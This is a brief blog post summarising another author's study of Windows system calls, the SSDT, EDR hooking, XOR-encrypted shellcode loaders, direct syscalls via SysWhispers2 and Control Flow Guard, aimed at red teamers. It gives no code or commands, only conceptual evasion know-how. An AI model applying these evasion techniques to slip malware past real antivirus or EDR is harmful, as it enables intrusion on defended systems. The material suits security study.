Cybersecurity

Understanding Windows Kernel and Direct Syscalls for Antivirus and EDR Evasion

By TFH,

Published on Nov 20, 2023   —   2 min read

Exploring the depths of the Windows kernel, particularly system calls (Syscalls), unveils fascinating insights for cybersecurity enthusiasts, especially those focused on red teaming, offensive security development, and software development. This blog post, inspired by the detailed analysis provided by Yazid on xacone.github.io, delves into the intricacies of Syscalls and their role in bypassing antivirus and Endpoint Detection and Response (EDR) systems.

The Journey of a Syscall in Windows

In Windows, Syscalls are critical intermediaries between user-mode applications and the kernel. Triggered by routines in the native API, notably the ntdll.dll API, they mark the transition from user-mode to kernel-mode. The introduction of Kernelbase in recent Windows versions adds a layer of complexity, offering an additional security layer and handling kernel version differences.

The Role of the System Service Dispatch Table (SSDT)

The SSDT is central to the functioning of Syscalls, mapping System Service Numbers (SSNs) to specific routines. While understanding the SSDT's mechanisms is complex, it's crucial to note its vulnerability to SSDT hooking by EDR solutions. Each SSN is associated with a specific routine, and the mapping varies depending on the Windows version.

Bypassing Antivirus and EDR Systems

Syscalls can be exploited to evade security systems. Inline API hooking, Import Address Table (IAT) hooking, and SSDT hooking are common methods used by EDR and antivirus systems to monitor potentially malicious code. Understanding and manipulating these methods are key to bypassing modern cybersecurity mechanisms.

Implementing Shellcode Loaders

Shellcode loaders play a vital role in defense evasion. The blog post discusses the implementation of a simple shellcode loader, which involves loading the shellcode into memory and detonating it. This process includes XOR encryption techniques to bypass static analysis tools like Kaspersky.

Advancing to Direct System Calls

The blog progresses to implementing mid-level and low-level direct system calls, aiming to bypass ntdll.dll and trigger Syscalls directly. This involves generating necessary functions using tools like SysWhispers2 and confronting challenges with protection mechanisms like Windows Control Flow Guard (CFG).

Challenges with Control Flow Guard (CFG)

CFG, a mitigation technology, presents significant challenges in executing shellcodes. It adds checks and restrictions to control flow, making it difficult for exploits to execute arbitrary code. The blog details Yazid's encounter with CFG's restrictions, highlighting the complexity of navigating modern Windows security features.

Conclusion

This exploration of Windows Syscalls and their application in bypassing antivirus and EDR systems underscores the complexities and challenges in the field of cybersecurity. It offers valuable insights for those keen on understanding Windows internals and defense evasion techniques.

References

  1. Yazid's original article on xacone.github.io provides a comprehensive exploration of Windows Syscalls and their role in cybersecurity​​.
  2. Further reading on Syscalls and their application can be found on resources like Red Ops, Red Team Notes, and Code Project, offering in-depth analyses and practical insights into Windows internals and security mechanisms.
Share on Facebook Share on Linkedin Share on Twitter Send by email

Subscribe to the newsletter

Subscribe to the newsletter for the latest news and work updates straight to your inbox, every week.

Subscribe